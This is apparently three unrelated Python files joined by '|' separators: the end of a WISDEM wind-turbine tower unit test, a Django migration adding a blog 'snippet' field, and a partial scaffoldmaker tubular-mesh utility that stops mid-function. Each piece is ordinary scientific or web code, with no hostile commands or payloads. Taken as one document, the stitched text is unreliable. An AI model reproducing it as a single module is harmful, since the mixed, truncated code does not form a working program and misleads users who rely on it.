self.discrete_inputs = {}
self.discrete_outputs = {}
# Store analysis options
self.modeling_options = {}
self.modeling_options["materials"] = {}
self.modeling_options["materials"]["n_mat"] = 1
self.modeling_options["flags"] = {}
self.modeling_options["flags"]["monopile"] = False
self.modeling_options["WISDEM"] = {}
self.modeling_options["WISDEM"]["TowerSE"] = {}
self.modeling_options["WISDEM"]["TowerSE"]["buckling_method"] = "eurocode"
self.modeling_options["WISDEM"]["TowerSE"]["buckling_length"] = 30.0
self.modeling_options["WISDEM"]["TowerSE"]["n_height_tower"] = 3
self.modeling_options["WISDEM"]["TowerSE"]["n_layers_tower"] = 1
self.modeling_options["WISDEM"]["TowerSE"]["n_height_monopile"] = 0
self.modeling_options["WISDEM"]["TowerSE"]["n_layers_monopile"] = 0
self.modeling_options["WISDEM"]["TowerSE"]["n_height"] = 3
self.modeling_options["WISDEM"]["TowerSE"]["n_refine"] = 3
self.modeling_options["WISDEM"]["TowerSE"]["wind"] = "PowerWind"
self.modeling_options["WISDEM"]["TowerSE"]["nLC"] = 1
self.modeling_options["WISDEM"]["TowerSE"]["soil_springs"] = False
self.modeling_options["WISDEM"]["TowerSE"]["gravity_foundation"] = False
self.modeling_options["WISDEM"]["TowerSE"]["gamma_f"] = 1.0
self.modeling_options["WISDEM"]["TowerSE"]["gamma_m"] = 1.0
self.modeling_options["WISDEM"]["TowerSE"]["gamma_n"] = 1.0
self.modeling_options["WISDEM"]["TowerSE"]["gamma_b"] = 1.0
self.modeling_options["WISDEM"]["TowerSE"]["gamma_fatigue"] = 1.0
# Simplified the options available to the user
self.modeling_options["WISDEM"]["TowerSE"]["frame3dd"] = {}
# self.modeling_options['TowerSE']['frame3dd']['DC'] = 80.0
self.modeling_options["WISDEM"]["TowerSE"]["frame3dd"]["shear"] = True
self.modeling_options["WISDEM"]["TowerSE"]["frame3dd"]["geom"] = True
# self.modeling_options['TowerSE']['frame3dd']['dx'] = -1
# self.modeling_options['TowerSE']['frame3dd']['nM'] = 6
# self.modeling_options['TowerSE']['frame3dd']['Mmethod'] = 1
# self.modeling_options['TowerSE']['frame3dd']['lump'] = 0
self.modeling_options["WISDEM"]["TowerSE"]["frame3dd"]["tol"] = 1e-9
# self.modeling_options['TowerSE']['frame3dd']['shift'] = 0.0
# self.modeling_options['TowerSE']['frame3dd']['add_gravity'] = True
def testPreFrame(self):
# Test Land
self.inputs["z_param"] = 10.0 * np.array([0.0, 3.0, 6.0])
self.inputs["z_full"] = 10.0 * np.arange(0, 7)
self.inputs["d_full"] = 6.0 * np.ones(self.inputs["z_full"].shape)
self.inputs["mass"] = 1e5
self.inputs["mI"] = np.r_[1e5, 1e5, 2e5, np.zeros(3)]
self.inputs["mrho"] = np.array([-3.0, 0.0, 1.0])
self.inputs["transition_piece_mass"] = 0.0
self.inputs["transition_piece_cost"] = 0.0
self.inputs["transition_piece_height"] = 0.0
self.inputs["transition_piece_I"] = np.zeros(6)
self.inputs["gravity_foundation_I"] = np.zeros(6)
self.inputs["gravity_foundation_mass"] = 0.0
self.inputs["suctionpile_depth"] = 0.0
self.inputs["rna_F"] = 1e5 * np.arange(2,5)
self.inputs["rna_M"] = 1e6 * np.arange(2,5)
self.inputs["E"] = 1e9 * np.ones(2)
self.inputs["G"] = 1e8 * np.ones(2)
self.inputs["sigma_y"] = 1e8 * np.ones(2)
myobj = tow.TowerPreFrame(n_height=3, n_refine=3, monopile=False)
myobj.compute(self.inputs, self.outputs)
npt.assert_equal(self.outputs["kidx"], np.array([0]))
npt.assert_equal(self.outputs["kx"], np.array([RIGID]))
npt.assert_equal(self.outputs["ky"], np.array([RIGID]))
npt.assert_equal(self.outputs["kz"], np.array([RIGID]))
npt.assert_equal(self.outputs["ktx"], np.array([RIGID]))
npt.assert_equal(self.outputs["kty"], np.array([RIGID]))
npt.assert_equal(self.outputs["ktz"], np.array([RIGID]))
npt.assert_equal(self.outputs["midx"], np.zeros(2))
npt.assert_equal(self.outputs["m"], np.zeros(2))
npt.assert_equal(self.outputs["mrhox"], np.zeros(2))
npt.assert_equal(self.outputs["mrhoy"], np.zeros(2))
npt.assert_equal(self.outputs["mrhoz"], np.zeros(2))
npt.assert_equal(self.outputs["mIxx"], np.zeros(2))
npt.assert_equal(self.outputs["mIyy"], np.zeros(2))
npt.assert_equal(self.outputs["mIzz"], np.zeros(2))
npt.assert_equal(self.outputs["mIxy"], np.zeros(2))
npt.assert_equal(self.outputs["mIxz"], np.zeros(2))
npt.assert_equal(self.outputs["mIyz"], np.zeros(2))
npt.assert_equal(self.outputs["plidx"], np.array([6]))
npt.assert_equal(self.outputs["Fx"], np.array([2e5]))
npt.assert_equal(self.outputs["Fy"], np.array([3e5]))
npt.assert_equal(self.outputs["Fz"], np.array([4e5]))
npt.assert_equal(self.outputs["Mxx"], np.array([2e6]))
npt.assert_equal(self.outputs["Myy"], np.array([3e6]))
npt.assert_equal(self.outputs["Mzz"], np.array([4e6]))
# Test Monopile no springs, no GBF
self.inputs["z_full"] = 10.0 * np.arange(-6, 7)
self.inputs["d_full"] = 6.0 * np.ones(self.inputs["z_full"].shape)
self.inputs["transition_piece_mass"] = 1e3
self.inputs["transition_piece_cost"] = 1e4
self.inputs["transition_piece_I"] = 1e3 * 9 * np.r_[0.5, 0.5, 1.0, np.zeros(3)]
self.inputs["transition_piece_height"] = 10.0
self.inputs["gravity_foundation_mass"] = 0.0 # 1e4
self.inputs["suctionpile_depth"] = 30.0
self.inputs["rna_F"] = 1e5 * np.arange(2,5)
self.inputs["rna_M"] = 1e6 * np.arange(2,5)
self.inputs["k_soil"] = (20.0 + np.arange(6))[np.newaxis, :] * np.ones((2, 6))
self.inputs["z_soil"] = np.r_[-30.0, 0.0]
myobj = tow.TowerPreFrame(n_height=5, n_refine=3, monopile=True, soil_springs=False)
myobj.compute(self.inputs, self.outputs)
npt.assert_equal(self.outputs["kidx"], np.arange(4))
npt.assert_equal(self.outputs["kx"], RIGID)
npt.assert_equal(self.outputs["ky"], RIGID)
npt.assert_equal(self.outputs["kz"], RIGID)
npt.assert_equal(self.outputs["ktx"], RIGID)
npt.assert_equal(self.outputs["kty"], RIGID)
npt.assert_equal(self.outputs["ktz"], RIGID)
npt.assert_equal(self.outputs["midx"], np.array([7, 0]))
npt.assert_equal(self.outputs["m"], np.array([1e3, 0.0]))
npt.assert_equal(self.outputs["mrhox"], np.zeros(2))
npt.assert_equal(self.outputs["mrhoy"], np.zeros(2))
npt.assert_equal(self.outputs["mrhoz"], np.zeros(2))
npt.assert_equal(self.outputs["mIxx"], np.array([1e3 * 9 * 0.5, 0]))
npt.assert_equal(self.outputs["mIyy"], np.array([1e3 * 9 * 0.5, 0]))
npt.assert_equal(self.outputs["mIzz"], np.array([1e3 * 9, 0]))
npt.assert_equal(self.outputs["mIxy"], np.zeros(2))
npt.assert_equal(self.outputs["mIxz"], np.zeros(2))
npt.assert_equal(self.outputs["mIyz"], np.zeros(2))
npt.assert_equal(self.outputs["plidx"], np.array([12]))
npt.assert_equal(self.outputs["Fx"], np.array([2e5]))
npt.assert_equal(self.outputs["Fy"], np.array([3e5]))
npt.assert_equal(self.outputs["Fz"], np.array([4e5]))
npt.assert_equal(self.outputs["Mxx"], np.array([2e6]))
npt.assert_equal(self.outputs["Myy"], np.array([3e6]))
npt.assert_equal(self.outputs["Mzz"], np.array([4e6]))
# Test Monopile springs, no GBF
self.inputs["z_full"] = 10.0 * np.arange(-6, 7)
self.inputs["d_full"] = 6.0 * np.ones(self.inputs["z_full"].shape)
self.inputs["transition_piece_mass"] = 1e3
self.inputs["transition_piece_cost"] = 1e4
self.inputs["transition_piece_I"] = 1e3 * 9 * np.r_[0.5, 0.5, 1.0, np.zeros(3)]
self.inputs["transition_piece_height"] = 10.0
self.inputs["gravity_foundation_mass"] = 0.0 # 1e4
self.inputs["suctionpile_depth"] = 30.0
self.inputs["rna_F"] = 1e5 * np.arange(2,5)
self.inputs["rna_M"] = 1e6 * np.arange(2,5)
self.inputs["k_soil"] = (20.0 + np.arange(6))[np.newaxis, :] * np.ones((2, 6))
self.inputs["z_soil"] = np.r_[-30.0, 0.0]
myobj = tow.TowerPreFrame(n_height=5, n_refine=3, monopile=True, soil_springs=True)
myobj.compute(self.inputs, self.outputs)
npt.assert_equal(self.outputs["kidx"], np.arange(4))
npt.assert_equal(self.outputs["kx"], 20.0)
npt.assert_equal(self.outputs["ky"], 22.0)
npt.assert_equal(self.outputs["kz"], np.r_[24.0, np.zeros(3)])
npt.assert_equal(self.outputs["ktx"], 21.0)
npt.assert_equal(self.outputs["kty"], 23.0)
npt.assert_equal(self.outputs["ktz"], 25.0)
npt.assert_equal(self.outputs["midx"], np.array([7, 0]))
npt.assert_equal(self.outputs["m"], np.array([1e3, 0.0]))
npt.assert_equal(self.outputs["mrhox"], np.zeros(2))
npt.assert_equal(self.outputs["mrhoy"], np.zeros(2))
npt.assert_equal(self.outputs["mrhoz"], np.zeros(2))
npt.assert_equal(self.outputs["mIxx"], np.array([1e3 * 9 * 0.5, 0]))
npt.assert_equal(self.outputs["mIyy"], np.array([1e3 * 9 * 0.5, 0]))
npt.assert_equal(self.outputs["mIzz"], np.array([1e3 * 9, 0]))
npt.assert_equal(self.outputs["mIxy"], np.zeros(2))
npt.assert_equal(self.outputs["mIxz"], np.zeros(2))
npt.assert_equal(self.outputs["mIyz"], np.zeros(2))
npt.assert_equal(self.outputs["plidx"], np.array([12]))
npt.assert_equal(self.outputs["Fx"], np.array([2e5]))
npt.assert_equal(self.outputs["Fy"], np.array([3e5]))
npt.assert_equal(self.outputs["Fz"], np.array([4e5]))
npt.assert_equal(self.outputs["Mxx"], np.array([2e6]))
npt.assert_equal(self.outputs["Myy"], np.array([3e6]))
npt.assert_equal(self.outputs["Mzz"], np.array([4e6]))
# Test Monopile with GBF- TODO: THESE REACTIONS NEED THOUGHT
self.inputs["z_full"] = 10.0 * np.arange(-6, 7)
self.inputs["d_full"] = 6.0 * np.ones(self.inputs["z_full"].shape)
self.inputs["transition_piece_mass"] = 1e3
self.inputs["transition_piece_cost"] = 1e4
self.inputs["transition_piece_height"] = 10.0
self.inputs["transition_piece_I"] = 1e3 * 9 * np.r_[0.5, 0.5, 1.0, np.zeros(3)]
self.inputs["gravity_foundation_I"] = 0.5 * 1e4 * 9 * np.r_[0.5, 0.5, 1.0, np.zeros(3)]
self.inputs["gravity_foundation_mass"] = 1e4
self.inputs["suctionpile_depth"] = 0.0
self.inputs["rna_F"] = 1e5 * np.arange(2,5)
self.inputs["rna_M"] = 1e6 * np.arange(2,5)
self.inputs["k_soil"] = (20.0 + np.arange(6))[np.newaxis, :] * np.ones((2, 6))
self.inputs["z_soil"] = np.r_[-30.0, 0.0]
myobj = tow.TowerPreFrame(n_height=5, n_refine=3, monopile=True, gravity_foundation=True)
myobj.compute(self.inputs, self.outputs)
npt.assert_equal(self.outputs["kidx"], np.array([0]))
npt.assert_equal(self.outputs["kx"], np.array([RIGID]))
npt.assert_equal(self.outputs["ky"], np.array([RIGID]))
npt.assert_equal(self.outputs["kz"], np.array([RIGID]))
npt.assert_equal(self.outputs["ktx"], np.array([RIGID]))
npt.assert_equal(self.outputs["kty"], np.array([RIGID]))
npt.assert_equal(self.outputs["ktz"], np.array([RIGID]))
npt.assert_equal(self.outputs["midx"], np.array([7, 0]))
npt.assert_equal(self.outputs["m"], np.array([1e3, 1e4]))
npt.assert_equal(self.outputs["mrhox"], np.zeros(2))
npt.assert_equal(self.outputs["mrhoy"], np.zeros(2))
npt.assert_equal(self.outputs["mrhoz"], np.zeros(2))
npt.assert_equal(self.outputs["mIxx"], np.array([1e3 * 9 * 0.5, 1e4 * 9 * 0.25]))
npt.assert_equal(self.outputs["mIyy"], np.array([1e3 * 9 * 0.5, 1e4 * 9 * 0.25]))
npt.assert_equal(self.outputs["mIzz"], np.array([1e3 * 9, 1e4 * 9 * 0.5]))
npt.assert_equal(self.outputs["mIxy"], np.zeros(2))
npt.assert_equal(self.outputs["mIxz"], np.zeros(2))
npt.assert_equal(self.outputs["mIyz"], np.zeros(2))
npt.assert_equal(self.outputs["plidx"], np.array([12]))
npt.assert_equal(self.outputs["Fx"], np.array([2e5]))
npt.assert_equal(self.outputs["Fy"], np.array([3e5]))
npt.assert_equal(self.outputs["Fz"], np.array([4e5]))
npt.assert_equal(self.outputs["Mxx"], np.array([2e6]))
npt.assert_equal(self.outputs["Myy"], np.array([3e6]))
npt.assert_equal(self.outputs["Mzz"], np.array([4e6]))
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestStruct))
return suite
if __name__ == "__main__":
result = unittest.TextTestRunner().run(suite())
if result.wasSuccessful():
exit(0)
else:
exit(1)
|
# Generated by Django 3.2 on 2021-05-12 14:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0002_alter_post_content'),
]
operations = [
migrations.AddField(
model_name='post',
name='snippet',
field=models.CharField(default='Click on the button below to read about this blog post...', max_length=60),
),
]
|
'''
Utility function for generating tubular mesh from a central line
using a segment profile.
'''
from __future__ import division
import math
from opencmiss.utils.zinc.field import findOrCreateFieldCoordinates, findOrCreateFieldTextureCoordinates
from opencmiss.zinc.element import Element
from opencmiss.zinc.field import Field
from opencmiss.zinc.node import Node
from scaffoldmaker.annotation.annotationgroup import AnnotationGroup, mergeAnnotationGroups
from scaffoldmaker.utils.eftfactory_bicubichermitelinear import eftfactory_bicubichermitelinear
from scaffoldmaker.utils.eftfactory_tricubichermite import eftfactory_tricubichermite
from scaffoldmaker.utils.geometry import createCirclePoints
from scaffoldmaker.utils import interpolation as interp
from scaffoldmaker.utils import matrix
from scaffoldmaker.utils import vector
def getPlaneProjectionOnCentralPath(x, elementsCountAround, elementsCountAlong,
segmentLength, sx, sd1, sd2, sd12):
"""
Projects reference point used for warping onto the central path and find coordinates
and derivatives at projected location.
:param x: coordinates of nodes.
:param elementsCountAround: number of elements around.
:param elementsCountAlong: number of elements along.
:param segmentLength: Length of segment.
:param sx: coordinates of equally spaced points on central path.
:param sd1: tangent of equally spaced points on central path.
:param sd2: derivative representing cross axis at equally spaced points on central path.
:param sd12: rate of change of cross axis at equally spaced points on central path.
:return: coordinates and derivatives on project points and z-coordinates of reference points.
"""
# Use first node in each group of elements along as reference for warping later
zRefList = []
for n2 in range(elementsCountAlong + 1):
zFirstNodeAlong = x[n2*elementsCountAround][2]
zRefList.append(zFirstNodeAlong)
# Find sx, sd1, sd2 at projection of reference points on central path
lengthElementAlong = segmentLength / elementsCountAlong
# Append values from first node on central path
sxRefList = []
sd1RefList = []
sd2RefList = []
sxRefList.append(sx[0])
sd1RefList.append(sd1[0])
sd2RefList.append(sd2[0])
# Interpolate the ones in between
for n2 in range(1, elementsCountAlong):
ei = int(zRefList[n2]//lengthElementAlong + 1)
xi = (zRefList[n2] - lengthElementAlong*(ei-1))/lengthElementAlong
sxRef = interp.interpolateCubicHermite(sx[ei - 1], sd1[ei - 1], sx[ei], sd1[ei], xi)
sd1Ref = interp.interpolateCubicHermiteDerivative(sx[ei - 1], sd1[ei - 1], sx[ei], sd1[ei], xi)
sd2Ref = interp.interpolateCubicHermite(sd2[ei - 1], sd12[ei - 1], sd2[ei], sd12[ei], xi)
sxRefList.append(sxRef)
sd1RefList.append(sd1Ref)
sd2RefList.append(sd2Ref)
# Append values from last node on central path
sxRefList.append(sx[-1])
sd1RefList.append(sd1[-1])
sd2RefList.append(sd2[-1])
# Project sd2 to plane orthogonal to sd1
sd2ProjectedListRef = []
for n in range(len(sd2RefList)):
sd1Normalised = vector.normalise(sd1RefList[n])
dp = vector.dotproduct(sd2RefList[n], sd1Normalised)
dpScaled = [dp * c for c in sd1Normalised]
sd2Projected = vector.normalise([sd2RefList[n][c] - dpScaled[c] for c in range(3)])
sd2ProjectedListRef.append(sd2Projected)
return sxRefList, sd1RefList, sd2ProjectedListRef, zRefList
def warpSegmentPoints(xList, d1List, d2List, segmentAxis,
sx, sd1, sd2, elementsCountAround, elementsCountAlongSegment,
refPointZ, innerRadiusAlong, closedProximalEnd):
"""
Warps points in segment to account for bending and twisting
along central path defined by nodes sx and derivatives sd1 and sd2.
:param xList: coordinates of segment points.
:param d1List: derivatives around axis of segment.
:param d2List: derivatives along axis of segment.
:param segmentAxis: axis perpendicular to segment plane.
:param sx: coordinates of points on central path.
:param sd1: derivatives of points along central path.
:param sd2: derivatives representing cross axes.
:param elementsCountAround: Number of elements around segment.
:param elementsCountAlongSegment: Number of elements along segment.
:param refPointZ: z-coordinate of reference point for each element
groups along the segment to be used for transformation.
:param innerRadiusAlong: radius of segment along length.
:param closedProximalEnd: True if proximal end of segment is a closed end.
:return coordinates and derivatives of warped points.
"""
xWarpedList = []
d1WarpedList = []
d2WarpedList = []
d2WarpedListFinal = []
d3WarpedUnitList = []
for nAlongSegment in range(elementsCountAlongSegment + 1):
xElementAlongSegment = xList[elementsCountAround*nAlongSegment: elementsCountAround*(nAlongSegment+1)]
d1ElementAlongSegment = d1List[elementsCountAround*nAlongSegment: elementsCountAround*(nAlongSegment+1)]
d2ElementAlongSegment = d2List[elementsCountAround*nAlongSegment: elementsCountAround*(nAlongSegment+1)]
centroid = [0.0, 0.0, refPointZ[nAlongSegment]]
# Rotate to align segment axis with tangent of central line
unitTangent = vector.normalise(sd1[nAlongSegment])
cp = vector.crossproduct3(segmentAxis, unitTangent)
dp = vector.dotproduct(segmentAxis, unitTangent)
if vector.magnitude(cp)> 0.0: # path tangent not parallel to segment axis
axisRot = vector.normalise(cp)
thetaRot = math.acos(vector.dotproduct(segmentAxis, unitTangent))
rotFrame = matrix.getRotationMatrixFromAxisAngle(axisRot, thetaRot)
centroidRot = [rotFrame[j][0]*centroid[0] + rotFrame[j][1]*centroid[1] + rotFrame[j][2]*centroid[2] for j in range(3)]
else: # path tangent parallel to segment axis (z-axis)
if dp == -1.0: # path tangent opposite direction to segment axis
thetaRot = math.pi
axisRot = [1.0, 0, 0]
rotFrame = matrix.getRotationMatrixFromAxisAngle(axisRot, thetaRot)
centroidRot = [rotFrame[j][0] * centroid[0] + rotFrame[j][1] * centroid[1] + rotFrame[j][2] * centroid[2] for j in range(3)]
else: # segment axis in same direction as unit tangent
rotFrame = [[1, 0, 0], [0, 1, 0], [0, 0, 1]]
centroidRot = centroid
translateMatrix = [sx[nAlongSegment][j] - centroidRot[j] for j in range(3)]
for n1 in range(elementsCountAround):
x = xElementAlongSegment[n1]
d1 = d1ElementAlongSegment[n1]
d2 = d2ElementAlongSegment[n1]
if vector.magnitude(cp)> 0.0: # path tangent not parallel to segment axis
xRot1 = [rotFrame[j][0]*x[0] + rotFrame[j][1]*x[1] + rotFrame[j][2]*x[2] for j in range(3)]
d1Rot1 = [rotFrame[j][0]*d1[0] + rotFrame[j][1]*d1[1] + rotFrame[j][2]*d1[2] for j in range(3)]
d2Rot1 = [rotFrame[j][0]*d2[0] + rotFrame[j][1]*d2[1] + rotFrame[j][2]*d2[2] for j in range(3)]
# xTranslate = [xRot1[j] + translateMatrix[j] for j in range(3)]
else: # path tangent parallel to segment axis
xRot1 = [rotFrame[j][0]*x[0] + rotFrame[j][1]*x[1] + rotFrame[j][2]*x[2] for j in range(3)] if dp == -1.0 else x
d1Rot1 = [rotFrame[j][0]*d1[0] + rotFrame[j][1]*d1[1] + rotFrame[j][2]*d1[2] for j in range(3)] if dp == -1.0 else d1
d2Rot1 = [rotFrame[j][0]*d2[0] + rotFrame[j][1]*d2[1] + rotFrame[j][2]*d2[2] for j in range(3)] if dp == -1.0 else d2
# xTranslate = [xRot1[j] + translateMatrix[j] for j in range(3)]
if n1 == 0: # Find angle between xCentroidRot and first node in the face
vectorToFirstNode = [xRot1[c] - centroidRot[c] for c in range(3)]
if vector.magnitude(vectorToFirstNode) > 0.0:
cp = vector.crossproduct3(vector.normalise(vectorToFirstNode), vector.normalise(sd2[nAlongSegment]))
if vector.magnitude(cp) > 1e-7:
cp = vector.normalise(cp)
signThetaRot2 = vector.dotproduct(unitTangent, cp)
thetaRot2 = math.acos(
vector.dotproduct(vector.normalise(vectorToFirstNode), sd2[nAlongSegment]))
axisRot2 = unitTangent
rotFrame2 = matrix.getRotationMatrixFromAxisAngle(axisRot2, signThetaRot2*thetaRot2)
else:
rotFrame2 = [[1, 0, 0], [0, 1, 0], [0, 0, 1]]
else:
rotFrame2 = [[1, 0, 0], [0, 1, 0], [0, 0, 1]]
xRot2 = [rotFrame2[j][0]*xRot1[0] + rotFrame2[j][1]*xRot1[1] + rotFrame2[j][2]*xRot1[2] for j in range(3)]
d1Rot2 = [rotFrame2[j][0]*d1Rot1[0] + rotFrame2[j][1]*d1Rot1[1] + rotFrame2[j][2]*d1Rot1[2] for j in range(3)]
d2Rot2 = [rotFrame2[j][0]*d2Rot1[0] + rotFrame2[j][1]*d2Rot1[1] + rotFrame2[j][2]*d2Rot1[2] for j in range(3)]
xTranslate = [xRot2[j] + translateMatrix[j] for j in range(3)]
xWarpedList.append(xTranslate)
d1WarpedList.append(d1Rot2)
d2WarpedList.append(d2Rot2)
# Scale d2 with curvature of central path
d2WarpedListScaled = []
vProjectedList = []
for nAlongSegment in range(elementsCountAlongSegment + 1):
for n1 in range(elementsCountAround):
n = nAlongSegment * elementsCountAround + n1
# Calculate norm
sd1Normalised = vector.normalise(sd1[nAlongSegment])
v = [xWarpedList[n][c] - sx[nAlongSegment][c] for c in range(3)]
dp = vector.dotproduct(v, sd1Normalised)
dpScaled = [dp * c for c in sd1Normalised]
vProjected = [v[c] - dpScaled[c] for c in range(3)]
vProjectedList.append(vProjected)
if vector.magnitude(vProjected) > 0.0:
vProjectedNormlised = vector.normalise(vProjected)
else:
vProjectedNormlised = [0.0, 0.0, 0.0]
# Calculate curvature along at each node
if nAlongSegment == 0:
curvature = interp.getCubicHermiteCurvature(sx[0], sd1[0], sx[1], sd1[1], vProjectedNormlised, 0.0)
elif nAlongSegment == elementsCountAlongSegment:
curvature = interp.getCubicHermiteCurvature(sx[-2], sd1[-2], sx[-1], sd1[-1], vProjectedNormlised, 1.0)
else:
curvature = 0.5 * (interp.getCubicHermiteCurvature(sx[nAlongSegment - 1], sd1[nAlongSegment - 1],
sx[nAlongSegment], sd1[nAlongSegment],
vProjectedNormlised, 1.0) +
interp.getCubicHermiteCurvature(sx[nAlongSegment], sd1[nAlongSegment],
sx[nAlongSegment + 1], sd1[nAlongSegment + 1],
vProjectedNormlised, 0.0))
# Scale
factor = 1.0 - curvature * innerRadiusAlong[nAlongSegment]
d2 = [factor * c for c in d2WarpedList[n]]
d2WarpedListScaled.append(d2)
# Smooth d2 for segment
smoothd2Raw = []
for n1 in range(elementsCountAround):
nx = []
nd2 = []
for n2 in range(elementsCountAlongSegment + 1):
n = n2*elementsCountAround + n1
nx.append(xWarpedList[n])
nd2.append(d2WarpedListScaled[n])
smoothd2 = interp.smoothCubicHermiteDerivativesLine(nx, nd2, fixStartDerivative = True, fixEndDerivative = True)
smoothd2Raw.append(smoothd2)
# Re-arrange smoothd2
for n2 in range(elementsCountAlongSegment + 1):
for n1 in range(elementsCountAround):
d2WarpedListFinal.append(smoothd2Raw[n1][n2])
# Calculate unit d3
for n in range(len(xWarpedList)):
d3Unit = vector.normalise(vector.crossproduct3(vector.normalise(d1WarpedList[n]),
vector.normalise(d2WarpedListFinal[n])))
d3WarpedUnitList.append(d3Unit)
return xWarpedList, d1WarpedList, d2WarpedListFinal, d3WarpedUnitList
def getCoordinatesFromInner(xInner, d1Inner, d2Inner, d3Inner,
wallThicknessList, relativeThicknessList, elementsCountAround,
elementsCountAlong, elementsCountThroughWall, transitElementList):
"""
Generates coordinates from inner to outer surface using coordinates
and derivatives of inner surface.
:param xInner: Coordinates on inner surface
:param d1Inner: Derivatives on inner surface around tube
:param d2Inner: Derivatives on inner surface along tube
:param d3Inner: Derivatives on inner surface through wall
:param wallThicknessList: Wall thickness for each element along tube
:param relativeThicknessList: Relative wall thickness for each element through wall
:param elementsCountAround: Number of elements around tube
:param elementsCountAlong: Number of elements along tube
:param elementsCountThroughWall: Number of elements through tube wall
:param transitElementList: stores true if element around is a transition
element that is between a big and a small element.
return nodes and derivatives for mesh, and curvature along inner surface.
"""
xOuter = []
curvatureAroundInner = []
curvatureAlong = []
curvatureList = []
xList = []
d1List = []
d2List = []
d3List = []
if relativeThicknessList:
xi3 = 0.0
xi3List = [0.0]
for n3 in range(elementsCountThroughWall):
xi3 += relativeThicknessList[n3]
xi3List.append(xi3)
relativeThicknessList.append(relativeThicknessList[-1])
for n2 in range(elementsCountAlong + 1):
wallThickness = wallThicknessList[n2]
for n1 in range(elementsCountAround):
n = n2*elementsCountAround + n1
norm = d3Inner[n]
# Calculate outer coordinates
x = [xInner[n][i] + norm[i]*wallThickness for i in range(3)]
xOuter.append(x)
# Calculate curvature along elements around
prevIdx = n - 1 if (n1 != 0) else (n2 + 1)*elementsCountAround - 1
nextIdx = n + 1 if (n1 < elementsCountAround - 1) else n2*elementsCountAround
kappam = interp.getCubicHermiteCurvatureSimple(xInner[prevIdx], d1Inner[prevIdx], xInner[n], d1Inner[n], 1.0)
kappap = interp.getCubicHermiteCurvatureSimple(xInner[n], d1Inner[n], xInner[nextIdx], d1Inner[nextIdx], 0.0)
if not transitElementList[n1] and not transitElementList[(n1-1)%elementsCountAround]:
curvatureAround = 0.5*(kappam + kappap)
elif transitElementList[n1]:
curvatureAround = kappam
elif transitElementList[(n1-1)%elementsCountAround]:
curvatureAround = kappap
curvatureAroundInner.append(curvatureAround)
# Calculate curvature along
if n2 == 0:
curvature = interp.getCubicHermiteCurvature(xInner[n], d2Inner[n], xInner[n + elementsCountAround],
d2Inner[n + elementsCountAround],
vector.normalise(d3Inner[n]), 0.0)
elif n2 == elementsCountAlong:
curvature = interp.getCubicHermiteCurvature(xInner[n - elementsCountAround],
d2Inner[n - elementsCountAround],
xInner[n], d2Inner[n], vector.normalise(d3Inner[n]), 1.0)
else:
curvature = 0.5*(
interp.getCubicHermiteCurvature(xInner[n - elementsCountAround], d2Inner[n - elementsCountAround],
xInner[n], d2Inner[n], vector.normalise(d3Inner[n]), 1.0) +
interp.getCubicHermiteCurvature(xInner[n], d2Inner[n],
xInner[n + elementsCountAround], d2Inner[n + elementsCountAround],
vector.normalise(d3Inner[n]), 0.0))
curvatureAlong.append(curvature)
for n3 in range(elementsCountThroughWall + 1):
xi3 = xi3List[n3] if relativeThicknessList else 1.0/elementsCountThroughWall * n3
for n1 in range(elementsCountAround):
n = n2*elementsCountAround + n1
norm = d3Inner[n]
innerx = xInner[n]
outerx = xOuter[n]
dWall = [wallThickness*c for c in norm]
# x
x = interp.interpolateCubicHermite(innerx, dWall, outerx, dWall, xi3)
xList.append(x)
# dx_ds1
factor = 1.0 + wallThickness*xi3 * curvatureAroundInner[n]
d1 = [ factor*c for c in d1Inner[n]]
d1List.append(d1)
# dx_ds2
curvature = curvatureAlong[n]
distance = vector.magnitude([x[i] - xInner[n][i] for i in range(3)])
factor = 1.0 - curvature*distance
d2 = [ factor*c for c in d2Inner[n]]
d2List.append(d2)
curvatureList.append(curvature)
#dx_ds3
d3 = [c * wallThickness * (relativeThicknessList[n3] if relativeThicknessList else 1.0/elementsCountThroughWall) for c in norm]
d3List.append(d3)
return xList, d1List, d2List, d3List, curvatureList
def createFlatCoordinates(xiList, lengthAroundList, totalLengthAlong, wallThickness, relativeThicknessList,
elementsCountAround, elementsCountAlong, elementsCountThroughWall, transitElementList):
"""
Calculates flat coordinates for a tube when it is opened into a flat preparation.
:param xiList: List containing xi for each point around the outer surface of the tube.
:param lengthAroundList: List of total arclength around the outer surface for each element along.
:param totalLengthAlong: Total length along tube.
:param wallThickness: Thickness of wall.
:param elementsCountAround: Number of elements around tube.
:param elementsCountAlong: Number of elements along tube.
:param elementsCountThroughWall: Number of elements through wall.
:param transitElementList: stores true if element around is a
transition element between a big and small element.
:return: coordinates and derivatives of flat coordinates field.
"""
if relativeThicknessList:
xi3 = 0.0
xi3List = [0.0]
for n3 in range(elementsCountThroughWall):
xi3 += relativeThicknessList[n3]
xi3List.append(xi3)
relativeThicknessList.append(relativeThicknessList[-1])
# Calculate flat coordinates and derivatives
xFlatList = []
d1FlatList = []
d2FlatList = []
for n2 in range(elementsCountAlong + 1):
xiFace = xiList[n2]
lengthAround = lengthAroundList[n2]
d1List = []
for n1 in range(len(xiFace)):
d1 = (xiFace[n1] - xiFace[n1-1]) if n1 > 0 else (xiFace[n1+1] - xiFace[n1])
d1List.append(d1)
# To modify derivative along transition elements
for i in range(len(transitElementList)):
if transitElementList[i]:
d1List[i+1] = d1List[i+2]
xPad = (lengthAroundList[0] - lengthAround)*0.5
for n3 in range(elementsCountThroughWall + 1):
z = wallThickness * (xi3List[n3] if relativeThicknessList else 1.0 / elementsCountThroughWall * n3)
for n1 in range(elementsCountAround + 1):
xFlat = [xPad + xiFace[n1] * lengthAround,
totalLengthAlong / elementsCountAlong * n2,
z]
d1Flat = [ d1List[n1]*lengthAround, 0.0, 0.0 ]
xFlatList.append(xFlat)
d1FlatList.append(d1Flat)
for n2 in range(elementsCountAlong):
for n3 in range(elementsCountThroughWall + 1):
for n1 in range(elementsCountAround + 1 ):
nodeIdx = n2*(elementsCountAround + 1)*(elementsCountThroughWall + 1) + n3*(elementsCountAround + 1) + n1
nodeNextElementAlong = nodeIdx + (elementsCountAround+1)*(elementsCountThroughWall + 1)
# print(nodeIdx + 1, nodeNextElementAlong + 1)
v1 = xFlatList[nodeNextElementAlong]
v2 = xFlatList[nodeIdx]
d1 = d2 = [v1[i] - v2[i] for i in range(3)]
arclength = interp.computeCubicHermiteArcLength(v1, d1, v2, d2, True)
d2Flat = vector.setMagnitude(d1, arclength)
d2FlatList.append(d2Flat)
